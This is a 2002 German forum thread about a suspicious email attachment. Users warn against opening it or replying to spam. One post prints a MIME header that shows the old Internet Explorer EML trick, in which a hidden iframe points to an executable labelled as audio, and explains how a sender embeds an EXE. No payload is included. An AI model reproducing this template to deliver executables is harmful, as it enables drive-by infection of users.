  |
|
|
 |
 Virus ? |
Der_Yeti 
Herrscher Der Welt
Dabei seit: 01.09.2002
Beiträge: 349
Herkunft: Niedersachsen
 |
|
Ich hab zwar keinen Plan was das füa ne datei ist, aber an deiner stelle wird ich sie niht öffnen....
Schreib doch mal ne mail an irgendwas@mail.ru und sag ihm er soll sich f.....(oder irgendwas anderes)
natürlich in enlisch, is ja ne russische adresse....
DerYeti
__________________
Wer Reschtschreibfehler findet, darf sie gerne behalten!!!
Rettet den Wald - Esst mehr Bieber!
|
|
02.09.2002 16:21 |
|
|
Cr4sh_Ov3r_umc
unregistriert
|
|
Hey HeaD
Hast du die Datei noch auf deinem PC??? Wenn ja kanst du sie mir schicken.. Ich glaube ich weiss was das ist. Nein das ist kein Virus. Du kannst aufatmen.
Bitte schicke sie wenn du sie noch hast Mail
Gruss CrAsH
|
|
|
14.11.2002 23:22 |
|
|
CDW
eine Simulation
Dabei seit: 12.10.2002
Beiträge: 1.329
Herkunft: CreateRemoteThread
|
|
es kann auch ein EML anhabg sein, je nach Konfigurations des Systems kann man ein da drin "verstecktes" programm ausführen, das Verfahren ist eher bekannt als Nimda Virus, schau einfach mal unter www.heise.de unter Browserchecks
|
|
|
16.11.2002 16:24 |
|
|
Fuchs
Senior Member
Dabei seit: 01.11.2002
Beiträge: 474
Herkunft: IM DSL_LIght Land
|
|
Aber es bringt einen sch... zu antworten, da die adressen sowiso gefackt sind und net echt, oder einfach tote briefkasten sind. Naja neuen account machen lassen, du kannst dichts gegen die Porno E_Mail versender gmbh machen! 
|
|
|
16.11.2002 16:33 |
|
|
zira
Senior Member
Dabei seit: 07.11.2002
Beiträge: 348
|
|
| Eml ? |
|
1) Was ist der Datei Typ EML ?
2) was die verdächtigen Attachments betrifft, kann es nicht nur ein Virus, sondern aber vielleicht ein betrügerischer Dialer sein der den PC zum Internet-Einwählen über 0190 oder teure Auslandsnummer umkonfiguriert.
|
|
|
17.11.2002 00:02 |
|
|
phlox81
Bote des Lichts und Moderator
Dabei seit: 19.10.2002
Beiträge: 3.028
Herkunft: Irgendwo im Nirgendwo
|
|
2 Sachen dazu.
NIEMALS AUF SPAM ANTWORTEN
denn, die meisten haben Antwortfilter laufen, dann
bekommst du erst recht Spam, mehr als dir lieb ist...
Zum anderen, wenn du nicht nach gefragt hast, mails mit
Attachments von unbekannten löschen, und bei Wiederholung
die email addy auf die Spam liste auf nehmen...
Devil
__________________
Intelligenz ist eine Illusion des Menschen
phlox81.de | codenode.de
|
|
|
17.11.2002 01:11 |
|
|
CDW
eine Simulation
Dabei seit: 12.10.2002
Beiträge: 1.329
Herkunft: CreateRemoteThread
|
|
EML ist, wenn ich das noch richtig weiß, der Dateityp für Anhänge in Outlook, leider weiß auch der IE was damit anzufangen und lädt in version 5.x so eine EML automatisch nach, wenn diese in die Seite eingebunden wird... in EML sollte eigentlich kein schädlicher Code untergebracht werden, sondern Video/Audio dateien... da dumme daran ist, das Microschrott da wieder geschlampt hat... ich poste mal einen Header der Datei:
| code: |
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
|
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base00
Content-ID: <EA4DMGBP9p>
|
|
wichtig ist der abschnitt:
| code: |
1:
2:
3:
4:
5:
|
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base00
Content-ID: <EA4DMGBP9p>
|
|
mit Content-Type gibt man an, das wäre eine Audiodatei, der name jedoch ist "hello.exe",das heißt, der nachfolgene Abschnitt danach wird in den Tempordner unter "hello.exe" entpackt und ausgeführt, ohne nachfrage... der Absender braucht bloß die EXE vorher mit einem Hexeditor zu öffnen und den Binärcode zu kopieren und einzufügen (also kaum verstand)...
Ab IE 6.0 oder nach entsprechenden patches fragt win jetzt, ob man die datei herunterladen möchte und öffnen, vorher wurde das ohne zustimmung gemacht!Das heiß, man brauchte GAR keinen Anhang zu öffnen und musste auch nicht zwangsweise Outlook nutzen, IE reichte schon aus 
Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von CDW: 17.11.2002 11:50.
|
|
|
17.11.2002 11:47 |
|
|
|
|
|
|
|
